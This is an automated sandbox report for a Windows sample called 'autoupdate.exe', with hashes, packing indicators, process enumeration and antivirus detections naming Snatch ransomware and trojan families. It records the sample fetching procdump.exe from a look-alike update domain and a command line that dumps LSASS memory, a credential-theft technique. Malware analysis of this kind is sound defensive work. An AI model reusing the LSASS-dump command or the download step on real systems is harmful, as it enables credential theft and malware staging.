popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

autoupdate.exe

Generic Malware Antivirus UPX Anti_VM PE File PE64 OS Processor Check PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 June 25, 2021, 3:15 p.m. June 25, 2021, 3:17 p.m.
Size 24.4MB
Type PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5 63e32043d2d8713aae718fc11416153b
SHA256 32ae83dce97b97caff308dc542e85e89570dc4eb35cdf10a357124300d3a1fe7
CRC32 0E2E8B65
ssdeep 393216:VWPx1jpayhjOzsjEvOdlJTdNXhFUbMwc:VWPx1jpaqOzsQvOdlJTLXUD
Yara
  • IsPE64 - (no description)
  • Antivirus - Contains references to security software
  • anti_vm_detect - Possibly employs anti-virtualization techniques
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
m.windowsupdatesupport.org
A 173.209.56.170
A 93.95.227.42
A 93.95.226.238
A 89.45.4.101
89.45.4.101
IP Address Status Action
164.124.101.2 Active Moloch
93.95.226.238 Active Moloch

section .symtab
request GET http://m.windowsupdatesupport.org/d/procdump.exe
file C:\Users\test22\AppData\Local\Temp\procdump.exe
file C:\Users\test22\AppData\Local\Temp\procdump64.exe
file C:\Users\test22\AppData\Local\Temp\procdump.exe
Time & API Arguments Status Return Repeated

Process32FirstW

 snapshot_handle: 0x0000028c
process_name: [System Process]
process_identifier: 0
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: System
process_identifier: 4
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: smss.exe
process_identifier: 224
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: csrss.exe
process_identifier: 300
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: wininit.exe
process_identifier: 348
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: csrss.exe
process_identifier: 364
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: winlogon.exe
process_identifier: 396
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: services.exe
process_identifier: 440
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: lsass.exe
process_identifier: 456
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: lsm.exe
process_identifier: 464
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: svchost.exe
process_identifier: 568
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: svchost.exe
process_identifier: 640
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: svchost.exe
process_identifier: 700
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: svchost.exe
process_identifier: 776
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: svchost.exe
process_identifier: 824
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: audiodg.exe
process_identifier: 892
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: svchost.exe
process_identifier: 968
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: svchost.exe
process_identifier: 264
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: spoolsv.exe
process_identifier: 820
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: svchost.exe
process_identifier: 292
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: svchost.exe
process_identifier: 1192
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: srvany.exe
process_identifier: 1244
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: taskhost.exe
process_identifier: 1284
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: KMService.exe
process_identifier: 1324
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: conhost.exe
process_identifier: 1376
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: sppsvc.exe
process_identifier: 1800
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: svchost.exe
process_identifier: 1876
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: dwm.exe
process_identifier: 1496
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: explorer.exe
process_identifier: 1848
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: WmiPrvSE.exe
process_identifier: 1916
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: pw.exe
process_identifier: 2816
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: SearchIndexer.exe
process_identifier: 2940
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: SearchProtocolHost.exe
process_identifier: 1480
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: SearchFilterHost.exe
process_identifier: 3040
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: SearchProtocolHost.exe
process_identifier: 2120
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: mobsync.exe
process_identifier: 1068
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: pw.exe
process_identifier: 1552
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: taskhost.exe
process_identifier: 2668
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: autoupdate.exe
process_identifier: 204
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: procdump.exe
process_identifier: 2164
1 1 0

Process32NextW

 snapshot_handle: 0x0000028c
process_name: conhost.exe
process_identifier: 2324
1 1 0
section {u'size_of_data': u'0x000fec00', u'virtual_address': u'0x01231000', u'entropy': 7.997411840270105, u'name': u'/19', u'virtual_size': u'0x000fea52'} entropy 7.99741184027 description A section with a high entropy has been found
section {u'size_of_data': u'0x00041a00', u'virtual_address': u'0x01330000', u'entropy': 7.934413337239673, u'name': u'/32', u'virtual_size': u'0x0004187e'} entropy 7.93441333724 description A section with a high entropy has been found
section {u'size_of_data': u'0x00008e00', u'virtual_address': u'0x01372000', u'entropy': 7.981208539807871, u'name': u'/46', u'virtual_size': u'0x00008ce8'} entropy 7.98120853981 description A section with a high entropy has been found
section {u'size_of_data': u'0x0001b600', u'virtual_address': u'0x0137b000', u'entropy': 7.994898579896918, u'name': u'/63', u'virtual_size': u'0x0001b45a'} entropy 7.9948985799 description A section with a high entropy has been found
section {u'size_of_data': u'0x001b3400', u'virtual_address': u'0x01398000', u'entropy': 7.998495817883657, u'name': u'/99', u'virtual_size': u'0x001b33e1'} entropy 7.99849581788 description A section with a high entropy has been found
section {u'size_of_data': u'0x00106000', u'virtual_address': u'0x0154c000', u'entropy': 7.997433392626542, u'name': u'/112', u'virtual_size': u'0x00105fe2'} entropy 7.99743339263 description A section with a high entropy has been found
section {u'size_of_data': u'0x00056800', u'virtual_address': u'0x01652000', u'entropy': 7.8393393003411695, u'name': u'/124', u'virtual_size': u'0x00056701'} entropy 7.83933930034 description A section with a high entropy has been found
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
file C:\Users\test22\AppData\Local\Temp\procdump.exe
file C:\Users\test22\AppData\Local\Temp\procdump64.exe
process: potential process injection target lsass.exe
cmdline C:\Users\test22\AppData\Local\Temp/procdump.exe -accepteula -ma lsass.exe C:\Users\test22\AppData\Local\Temp/1.dmp
Time & API Arguments Status Return Repeated

LdrGetProcedureAddress

 ordinal: 0
function_address: 0x000007feff017a50
function_name: wine_get_version
module: ntdll
module_address: 0x00000000771c0000
-1073741511 0
MicroWorld-eScan Gen:Variant.Ransom.Snatch.7
FireEye Gen:Variant.Ransom.Snatch.7
ALYac Gen:Variant.Ransom.Snatch.7
Cylance Unsafe
AegisLab Trojan.Win32.Snatch.4!c
Sangfor Trojan.Win32.Wofith.ky
Symantec Trojan.Gen.2
Avast FileRepMalware
Kaspersky Trojan.Win32.Wofith.hbp
BitDefender Gen:Variant.Ransom.Snatch.7
Ad-Aware Gen:Variant.Ransom.Snatch.7
Emsisoft Gen:Variant.Ransom.Snatch.7 (B)
DrWeb Trojan.DownLoader40.1016
McAfee-GW-Edition Artemis
Sophos Generic PUA FH (PUA)
Paloalto generic.ml
Webroot W32.Trojan.Gen
MAX malware (ai score=86)
Kingsoft Win32.Troj.Wofith.h.(kcloud)
Microsoft Trojan:Win32/Wacatac.B!ml
GData Gen:Variant.Ransom.Snatch.7
McAfee Artemis!63E32043D2D8
TrendMicro-HouseCall TROJ_GEN.R002H09FO21
Fortinet Malicious_Behavior.SB
MaxSecure Trojan.Malware.300983.susgen
AVG FileRepMalware